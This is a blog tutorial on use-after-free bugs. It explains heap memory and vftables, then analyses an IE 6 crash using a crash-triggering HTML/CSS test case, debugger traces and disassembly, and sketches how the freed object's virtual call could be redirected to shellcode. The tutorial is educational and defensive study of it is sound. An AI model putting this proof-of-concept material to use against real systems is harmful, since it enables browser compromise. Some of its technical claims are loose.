Beginners Guide to “Use after free Exploits #IE 0-day Exploit Development”

Last week a friend asked few queries regarding use after free vulnerabilities, . It’s been a while I wrote a tutorial so taught of cooking a beginners guide this week end. I wanted a live target for the tutorial so my plans were to run my fuzzer on an old version of IE 6, since it is easy to find a bug in and it’s not worth to blog out any new versions 0-day . Any way I picked up the first test case IE crashed on and did some analysis to add it up to this tutorial.I didn’t spent much time with the crash since it’s pointless to digg deep

So this blog post I will explain in detail the following.

1)The OS Heap and memory allocations.
2)Use after free issues and example buggy codes.
3) Analysis of a IE 6 crash, Use after free issue.
4) Exploiting Use after free bugs.
*Stay tuned for some Win8 IE10 stuffs ;

The Basics of OS Memory Management :

Memory used by program is divided into four,

  • The code area aka text segment [compiled program in memory ].
  • The globals [global variables are stored] .
Initialized Data Segment
Uninitialized Data Segment.
  • The heap, dynamically allocated variables.
  • The stack, parameters and local variables .

Code Area:
This is the region in a virtual address space that holds the executing instructions.It is is assigned memory below the stack and heap, to prevent an overflow overwriting the code.

The Globals:

Initialized Data segment [DS].

This region holds the global and static variables that are initialized by the programmer.

For example:

Code:
int a = 0;
char * fb ="fb1h2s";

The string is stored in the initialized read only area.

Uninitialized Data segment [BSS].

For example:

Code:
int a 
int b ;

This would be in the BSS segment

Stack:

Stack is a [Last in First out] data structure , so it’s basically used for local storages and function calls etc.It has got it’s own registers and instructions sets. So it even hold the raw byte of instruction executed by the program. This is one of the reason why stack based vulnerabilities are easy to exploit.

Stack allocations are done when variables are stored directly to memory .

For example:

PHP Code:
void f()
{
if(true) {
int b = 0;
}
b = 1;
}

Here value of “b” is already declared and know so “int b” is allocated on the stack.
*b is not available outside the if { } block, so the above program would have compilation issues.

Heap :
So considering the above if we need to handle memmory dynamically ,thats where Heap comes into picture. Heap overtakes the disability of stack, it’s is the segment where dynamic memory allocation usually takes place.
Unlike stack memmory allocations[LIFO] the term “heap memory allocations” is unrelated to heap data structure. It’s basically a linked list of used and free blocks. When a request for memory is made by functions like (new,malloc,GlobalAlloc,LocalAlloc, malloc,HeapAlloc,RtlAllocateHeap etc) they are satisfied by providing a suitable block from one of the free blocks. This requires updating list of blocks on the heap [Heap Management ]. This meta information about the blocks on the heap is also stored on the heap often in a small area just in front of every block .The various OS implementation of heap management functions make use of these meta info when allocating and freeing heap. And the many heap based exploits out there make use of these heap management structures to achieve code execution by feeding them with malformed data.
Note: Heap overflow and [Dangling pointer, Use after free bugs] are two diff things.

Bulletins:

• The heap size is predefined at application startup but can grow as per required.

• You would use the heap if you don’t know exactly how much data you will need at runtime or if you need to allocate a lot of data.

• Responsible for memory leak, you need to free the unused memory manually.

• You need to manually free memory onces it is no more in use and that should never fall out of scope. The data is freed with GlobalFree , LocalFree, delete[] free etc functions .

• Can have allocation failures if too big of a buffer is requested to be allocated.

• All shared libraries and dynamically loaded modules in a process could access the heap. This same reason why you can do heap spraying on a browser using any loaded modules example: flash,java script ,vbs etc.

memory management – What and where are the stack and heap? – Stack Overflow

Example Program Demonstrating memory allocations.

PHP Code:

int *x; /* Uninitialized variable stored in bss*/
int w; /* Uninitialized variable stored in bss*/
int y =10 ; /* Initialized variable stored in DSS*/
void b()
{
if(1==1)
{
x = malloc(sizeof(int)); /* Memmory allocated in Heap */
/*memory not freed */
}
}void c()
{
free(x); /* Memory Freed */
}
int main(void)
{
static int f =10  ; /* Initialized static variable stored in DS */
static int i; /* Uninitialized static variable stored in bss */
b();
c();
return 0;
}

http://www.geeksforgeeks.org/archives/14268

In short large variables of arrays whose size may vary, heap memory allocation is used. So heap related security issues occur when
1) Not freeing all of the memory allocated ending up with memory leaks.
2)Using of already released memory would lead to Use after free security issues.
3) Double freeing memory would cause memory corruptions .

Use after free issues and example buggy codes.
[I]#dangling pointers #use after free #double free

Example Buggy program:

Code:
int main(void)
{   
char *ch_ptr = malloc(100);
int i;
for (i = 0; i < 99; i++) 
{
ch_ptr = 'A';
free(ch_ptr);
printf("%s\n", ch_ptr);

}

}

Here at line 3 char_ptr is allocated a 100 bytes heap and later inside the for loop at line 8 the heap is deallocated. And at line 9 the de referenced pointer is called again. So this will trigger a memory corruption as follows.

So the exploitation goes based on the nature of the crash, we will dig into the exploitation methods later.

A Live example:

For demonstration a good and easy to understand bug would be the CVE-2009-1379 OpenSSL from 0.9.8 to 0.9.8k use after free bug.

The buggy code:

https://bugzilla.redhat.com/attachme…71&action=diff
The Bug:

al is initilized at line 424 to &frag->msg_header and at line 533 it’s freed using dtls1_hm_fragment_free(frag); and at line 536 if the following condition satisfies “(if al=0)” then program will try to access “frag” line 539 which was freed at line 533. So this will cause an invalid read operation , possibly crashing the app, and if we are some how able to control the adress that its reading form [heap spray!! or what ever], then we would be able to achieve code execution.

The Fix:
The simple fix to this was to add a temporary variable at line 533 “frag_len = frag->msg_header.frag_len; holding frag->msg_header.frag_len. And later return frag_len instead of the freed object.

Fuzzing for Use After Free and Fuzzers

*We will have another blog post for this some time later.

Exploiting Use after free bugs.

C++ Virtual Functions :

C++ matches a correct function call based on the type of the object at runtime. This is called dynamic binding and this is done by using the keyword “virtual”. The virtual keyword instructs the compiler that it should choose the right function based on the object it’s reference referred to rather than the type. These objects that are referred by virtual functions points to a virtual table VFTABLE[Virtual Function Table] . It’s where all the virtual functions adress are stored. It would be the first DWORD in the object memory.


Image Source:http://www.blackhat.com/presentation…07-afek-WP.pdf

Example Program:

PHP Code:
#include<iostream>
using namespace std;
class Test
{
public :virtual void Show()
{
cout<<“I am in Test Class”<<endl;
}
};class Test1 : public Test
{
public:
virtual void Show()
{
cout<<“I am in Test1 Class”<<endl;
}

};

int main()
{
Test *Obj;

Test Obj1;   // Base Class Object

Test1 Obj2;  //Derived Class Object

Obj = &Obj2;

Obj->Show();  //In this case derived class show function called.

Obj = &Obj1;

Obj->Show(); //In this case Base class show function called.
}

[B]And the output is :[/B]

[CODE]I am in Test1 Class
I am in Test Class[/CODE]

Virtual Functions in C++
IBM Linux Compilers

The above program will have the following vftable structure.

Code:
Class Test size(8):
      +---
      |{vfptr}
      +---

      Test's Vftable:
      +--
      | {vfptr}
      | &test::Show

Class Test1 size(8):
      +---
      |{vfptr}
      +---      

      Test1's Vftable:
      +--
      | {vfptr}
      | &test1::Show

Code:
004013D0  |. 8D45 C8        LEA EAX,DWORD PTR SS:[EBP-38]
004013D3  |. 8945 F4        MOV DWORD PTR SS:[EBP-C],EAX
004013D6  |. 8B45 F4        MOV EAX,DWORD PTR SS:[EBP-C]
004013D9  |. 8B10           MOV EDX,DWORD PTR DS:[EAX]
004013DB  |. 8B45 F4        MOV EAX,DWORD PTR SS:[EBP-C]
004013DE  |. 890424         MOV DWORD PTR SS:[ESP],EAX
004013E1  |. 8B02           MOV EAX,DWORD PTR DS:[EDX]
004013E3  |. FFD0           CALL EAX


Here EAX point to the Virtual Function table which point to calls the "Test1" 

004013E5  |. C70424 0000440>MOV DWORD PTR SS:[ESP],vfunc.00440000                  ; |ASCII "pause"
004013EC  |. E8 AFF20000    CALL <JMP.&msvcrt.system>                              ; \system
004013F1  |. 8D45 D8        LEA EAX,DWORD PTR SS:[EBP-28]
004013F4  |. 8945 F4        MOV DWORD PTR SS:[EBP-C],EAX
004013F7  |. 8B45 F4        MOV EAX,DWORD PTR SS:[EBP-C]
004013FA  |. 8B10           MOV EDX,DWORD PTR DS:[EAX]
004013FC  |. 8B45 F4        MOV EAX,DWORD PTR SS:[EBP-C]
004013FF  |. 890424         MOV DWORD PTR SS:[ESP],EAX
00401402  |. 8B02           MOV EAX,DWORD PTR DS:[EDX]
00401404  |. FFD0           CALL EAX
Here EAX point to the Virtual Function table and calls the "Test" class

00401406  |. C70424 0000440>MOV DWORD PTR SS:[ESP],vfunc.00440000                  ; |ASCII "pause"
0040140D  |. E8 8EF20000    CALL <JMP.&msvcrt.system>                              ; \system
00401412  |. B8 00000000    MOV EAX,0
00401417  |. C9             LEAVE
00401418  \. C3             RETN

Lets put a break point on Call and analyze where EAX point to:

Code:
0:000> t
eax=00410a5c ebx=00004000 ecx=0040cc50 edx=00441c84 esi=00def786 edi=00def6f2
eip=004013e3 esp=0022ff10 ebp=0022ff78 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
image00400000+0x13e3:
004013e3 ffd0            call    eax {image00400000+0x10a5c (00410a5c)}

0:000> u 00410a5c
image00400000+0x10a5c:
00410a5c 55              push    ebp
00410a5d 89e5            mov     ebp,esp
00410a5f 83ec08          sub     esp,8
00410a62 c744240419004400 mov     dword ptr [esp+4],offset image00400000+0x40019 (00440019)
00410a6a c70424c0334400  mov     dword ptr [esp],offset image00400000+0x433c0 (004433c0)
00410a71 e8a6b60200      call    image00400000+0x3c11c (0043c11c)
00410a76 c7442404ecae4300 mov     dword ptr [esp+4],offset image00400000+0x3aeec (0043aeec)
00410a7e 890424          mov     dword ptr [esp],eax

Now that we are clear how VFtable works the exploitation of Use-after free could be done a couple of ways.The basic way of doing it would be.

  • De allocate an object having a VFT entry
  • Controlling the Vftable and pointing it to out own [shellcode]code.
  • So now when a Virtual Function call takes place it point to our injected code.

Use After Free Exploitation [IE 6 0-day].

HTML Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTAL 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="refresh" content="1">
<title>FB1H2S Browser Test , soemthing weired here</title>
<link href="sass.css" rel="stylesheet" type="text/css"/>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript"></script>
<script>

document.write("FB1H2S Use After Free test#213");
</script>

</head>

<body>

<div style="float:left; width:770px; margin-left:8px;">

<div class="fb1h2s_fb1h2s">

</div>
<span > </span>

<div class="fb1h2s_fb1h2s_fb1h2s">

<div class="fb1h2s_fb1h2s_fb1h4s" >
IE WTF
</div>

<div class="aboutproduct">FB1H2s : FB!H2S : THE Garage 4 Hackers : Bla Bla Bla</div>
</div>

<div class="fb1h2s_fb1h2s_fb1h3s">

</div>
</div>

</body>
</html>
sass.css

.fb1h2s_fb1h2s,
.fb1h2s_fb1h2s_fb1h2s{background-color:#fff;width:564px;float:left;height:auto;marg  in:5px 0 5px 9px}
.fb1h2s_fb1h2s_fb1h3s{float:left;width:164px;margi  n-left:5px}
.fb1h2s_fb1h2s_fb1h4s{width:551px;height:34px;back  ground-repeat:no-repeat;font-size:13px;font-weight:700;font-family:arial;margin-left:10px;float:left;padding:7px 0 0 10px}
.aboutproduct{width:530px;height:auto;text-align:justify;line-height:18px;float:left;font-family:arial;color:#333;margin-bottom:10px;padding:0 5px 5px 13px}

The program crashes on IE 6 with the following exception.

Code:
(914.8fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=04cb4740 ebx=00000000 ecx=04cb4740 edx=04b80bfc esi=04cd8b40 edi=00080000
eip=7d51f463 esp=0013e5a4 ebp=0013e5f0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CDispNode::GetRootNode+0x6:
7d51f463 8b4808          mov     ecx,dword ptr [eax+8] ds:0023:04cb4748=????????

The Backtrace.

Code:
0:000> knL
 # ChildEBP RetAddr  
00 0013b478 7d54f5c0 mshtml!CDispNode::GetDispRoot+0x12
01 0013b4bc 7d55118b mshtml!CDispNode::ReplaceNode+0xdb
02 0013b50c 7d50b3ad mshtml!CLayout::EnsureDispNodeCore+0x348
03 0013b5bc 7d688af4 mshtml!CLayout::EnsureDispNode+0x5a
04 0013b7f0 7d5b170b mshtml!CFlowLayout::CalcSizeCoreCSS1Strict+0x3ff
05 0013b808 7d50a136 mshtml!CFlowLayout::CalcSizeCore+0x2f
06 0013b840 7d5069d1 mshtml!CFlowLayout::CalcSizeVirtual+0x17e
07 0013b954 7d539257 mshtml!CLayout::CalcSize+0x224
08 0013b9c8 7d539def mshtml!CFlowLayout::MeasureSite+0x1e5
09 0013ba0c 7d539d26 mshtml!CFlowLayout::GetSiteWidth+0x12b
0a 0013ba38 7d6ca5e3 mshtml!CLSMeasurer::GetSiteWidth+0x80
0b 0013bb44 7d5befb2 mshtml!CRecalcLinePtr::AlignObjects+0x30b
0c 0013bbc4 7d5136e0 mshtml!CRecalcLinePtr::CalcAlignedSitesAtBOLCore+0x1d7
0d 0013bc14 7d514345 mshtml!CRecalcLinePtr::CalcAlignedSitesAtBOL+0xa9
0e 0013bcc8 7d5131cd mshtml!CRecalcLinePtr::MeasureLine+0x384
0f 0013c084 7d5114a5 mshtml!CDisplay::RecalcLinesWithMeasurer+0x502
10 0013c204 7d506252 mshtml!CDisplay::RecalcLines+0x67
11 0013c21c 7d506529 mshtml!CDisplay::RecalcView+0x6b
12 0013c2c4 7d689582 mshtml!CFlowLayout::CalcTextSize+0x2ee
13 0013c4fc 7d5b170b mshtml!CFlowLayout::CalcSizeCoreCSS1Strict+0xe8d

Disassembly of the crashed function:

Code:
mshtml!CDispNode::GetRootNode+0x6:
7d51f463 8b4808          mov     ecx,dword ptr [eax+8]
7d51f466 85c9            test    ecx,ecx
7d51f468 7404            je      mshtml!CDispNode::GetRootNode+0xd (7d51f46e)
7d51f46a 8bc1            mov     eax,ecx
7d51f46c ebf5            jmp     mshtml!CDispNode::GetRootNode+0x6 (7d51f463)
7d51f46e c3              ret

The entire code flow is as follows.

Code:
mshtml!CDispNode::GetDispRoot:
7d51f437 8bff            mov     edi,edi
7d51f439 56              push    esi
7d51f43a e822000000      call    mshtml!CDispNode::GetRootNode (7d51f461)
7d51f43f 8bf0            mov     esi,eax
7d51f441 85f6            test    esi,esi
7d51f443 0f84c1020000    je      mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a)
7d51f449 8b06            mov     eax,dword ptr [esi]
7d51f44b 8bce            mov     ecx,esi
7d51f44d ff5034          call    dword ptr [eax+34h]
7d51f450 85c0            test    eax,eax
7d51f452 0f84b2020000    je      mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a)
7d51f458 8bc6            mov     eax,esi
7d51f45a 5e              pop     esi
7d51f45b c3              ret
7d51f45c 90              nop
7d51f45d 90              nop
7d51f45e 90              nop
7d51f45f 90              nop
7d51f460 90              nop
mshtml!CDispNode::GetRootNode:
7d51f461 8bc1            mov     eax,ecx
7d51f463 8b4808          mov     ecx,dword ptr [eax+8] ds:0023:04cb4748=????????
7d51f466 85c9            test    ecx,ecx
7d51f468 7404            je      mshtml!CDispNode::GetRootNode+0xd (7d51f46e)
7d51f46a 8bc1            mov     eax,ecx
7d51f46c ebf5            jmp     mshtml!CDispNode::GetRootNode+0x6 (7d51f463)
7d51f46e c3              ret

The C equivalent code:

PHP Code:
int __thiscall CElement__GetParentAncestorSafe(int this, int a2)
{
int result; // eax@1
int v3; // ecx@1
int v4; // ecx@2
v3 = *(_DWORD *)(this + 16);
result = 0;
if ( v3 )
{
v4 = *(_DWORD *)(v3 + 4);
if ( v4 )
{
do
{
if ( *(_BYTE *)(v4 + 8) == a2 )
break;
v4 = *(_DWORD *)(v4 + 4);
}
while ( v4 );
if ( v4 )
result = *(_DWORD *)v4;
}
}
return result;
}/(7D51F437)
void *__thiscall CDispNode__GetDispRoot(void *this)
{
void *v1; // eax@1
void *v2; // esi@1
void *result; // eax@3v1 = CDispNode__GetRootNode(this);
v2 = v1;
if ( v1 && (*(int (__thiscall **)(_DWORD))(*(_DWORD *)v1 + 52))(v1) )
result = v2;
else
result = 0;
return result;
}

The program crashes due to a use after free issue.

Code:
>u 7d51f463 
7d51f463 8b4808          mov     ecx,dword ptr [eax+8]

Here EAX is pointer to an Object element and ECX to the vftable. Here the object pointed to by the Vftable is freed, and there by the memory location pointed by EAX.

Code:
0:000> d 04cb4748
04cb4748  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
04cb4758  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
04cb4768  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
04cb4778  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??    ????????????????

If you look at the next instructions , we notice the following .

Code:
7d51f466 85c9            test    ecx,ecx 
7d51f468 7404            je      mshtml!CDispNode::GetRootNode+0xd (7d51f46e)
7d51f46a 8bc1            mov     eax,ecx
7d51f46c ebf5            jmp     mshtml!CDispNode::GetRootNode+0x6 (7d51f463)
7d51f46e c3              ret

The Pesudo Code:

Code:
ecx = dword ptr[ eax+8 ] 

if (ecx ==0):

 -7d51f46e: return(eax)  to 7d51f43f [calling module]
|
|  else:
|      loop()
|
|->  and at:7d51f43f  

{

 mov     esi,eax  <-- value of eax returned form the above function
  test    esi,esi    <-- if (esi) ==0  take jmp
 je      mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a)

 mov     eax,dword ptr [esi]  ds:0023:04ca1d40=
               <-- move to eax data pointed by esi

 mov     ecx,esi  <-- not usefull 
 call    dword ptr [eax+34h] <-- call adress pointed by eax+34h}

So if we can make { mov ecx,dword ptr [eax+8] }point to the heap such a way that EAX+8 contains [00000000] and EAX contains a adress we control , we would have code execution. We can initialize this area using heap spray.

What I did was arranged my HTML tags such a way that it would leave a lot of garbage values mainly null in the EAX pointed memory, and then the program would crash at the call instruction. This is never the right way of doing nor reliable, but it was working fine for me.

No we could take control of the program here.

Code:
7d51f44d ff5034          call    dword ptr [eax+34h]
Code:
(36c.440): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=01c53380 ecx=01c3e6e0 edx=000000a4 esi=01c3e6e0 edi=01c071f4
eip=7d51f44d esp=0013b478 ebp=0013b4bc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CDispNode::GetDispRoot+0x12:
7d51f44d ff5034          call    dword ptr [eax+34h]  ds:0023:00000034=????????
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Code:
mshtml!CDispNode::GetDispRoot:
7d51f437 8bff            mov     edi,edi
7d51f439 56              push    esi
7d51f43a e822000000      call    mshtml!CDispNode::GetRootNode (7d51f461)
7d51f43f 8bf0            mov     esi,eax
7d51f441 85f6            test    esi,esi
7d51f443 0f84c1020000    je      mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a)
7d51f449 8b06            mov     eax,dword ptr [esi]
7d51f44b 8bce            mov     ecx,esi
7d51f44d ff5034          call    dword ptr [eax+34h]  ds:0023:00000034=????????
7d51f450 85c0            test    eax,eax
7d51f452 0f84b2020000    je      mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a)

7d51f449 8b06 mov eax,dword ptr [esi]

Move DWORD (a 32-bit/4-byte value) in memory location specified by ESI[01c3e6e0]–>”00000000″ into register EAX, so EAX becomes [00000000]

7d51f44d ff5034 call dword ptr [eax+34h]

The crash is at a virtual Call with [Register + offset ] . The Vftable is in eax + offset[34h] the adress of function to be executed . In this case it would be 13th entry in the table. Now that it’s pointing to [00000000] the program crashes.

We can take control of the program here and have code execution, for that we need to find the type of object that was freed and the no of bytes that was allocated . Knowing these details we would be able to build fake objects of that size using JS . So that a the call at 7d51f463 [eax+8] would land on our crafted Vftable object and return [00000000] and

Code:
7d51f463 8b4808          mov     ecx,dword ptr [eax+8]

a call to

Code:
7d51f44d ff5034 call dword ptr [eax+34h]

Vftable+34h would make the program land on our shellcode.

There are couple of ways to exploit this a good reference would be this.

1) The double reference exploit

Requirements:

A controllable VFTable pointer.

Method:

Our own code is placed in the deallocated object or some where in the memory where we could point to via Vftable.

Then we replace the VFTable pointer by one which points to some memory
later we will use this as VFTable pointing back to where we put our code.

source:

2) The VFTable exploit

Requirements:
A controllable VFTable .
Method:
Our code is injected in the VFTable which is made to point to itself.

Depends:

This this achieved by the system allocation process.

The Lookaside exploit

Requirements:

A controllable heap allocation / heap deallocation cycle.

Method:

Since the system reallocates a freed memory , we craft the code in such a way that when reallocation takes place our injected code is used in the reallocation cycle.

Read More: http://www.blackhat.com/presentation…irov-apr19.pdf
Read in detail here a similar approach http://securityevaluators.com/files/…/isewoot08.pdf

For choosing an appropriate method for exploitation we need determine what all we control in the current scenario and understand more about the crash. We can either use the debugger for this purpose or reverse engineer the current code to figure out those details.

*Thanks to w3devil and Zarul for proof reading the doc

Cheers.

References on Heap :

A practical C storage class scope and memory allocation programming online training – C language references, working program examples, source code and memory related function library
Data segment – Wikipedia, the free encyclopedia
Memory segmentation – Wikipedia, the free encyclopedia
.bss – Wikipedia, the free encyclopedia
Memory Layout of C Programs – GeeksforGeeks | GeeksforGeeks
gperftools – Fast, multi-threaded malloc() and nifty performance analysis tools – Google Project Hosting
A Heap of Risk – The H Security: News and Features
http://x9090.blogspot.in/2010/03/tut…rial-from.html
http://en.wikibooks.org/wiki/C_Progr…Use_after_free
http://www.quora.com/Why-is-dynamic-…ory-allocation
http://eli.thegreenplace.net/2011/09…out-on-x86-64/

Exploitation References :
http://d0cs4vage.blogspot.in/2011/06…ugs-patch.html
http://www.phreedom.org/research/hea…feng-shui.html
http://securityevaluators.com/files/…/isewoot08.pdf
http://www.exploit-monday.com/2011_11_13_archive.html
www.blackhat.com/presentations/bh-usa-09/MCDONALD/BHUSA09-McDonald-WindowsHeap-PAPER.pdf
http://www.phreedom.org/research/hea…feng-shui.html
http://www.thegreycorner.com/2010/01…-internet.html
https://www.owasp.org/images/0/01/OW…_Heapspray.pdf
https://www.corelan.be/index.php/201…spray_8211_IE6
http://www.blackhat.com/presentation…07-afek-WP.pdf
http://www.blackhat.com/presentation…irov-apr19.pdf
http://www.exploit-monday.com/2011/0…r-free_07.html
http://www.vupen.com/blog/20120116.A…30_Part_II.php

Protection Mechanisms:
http://robert.ocallahan.org/2010/10/…-using_15.html

Big thanks and credit to:  fb1h2s

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s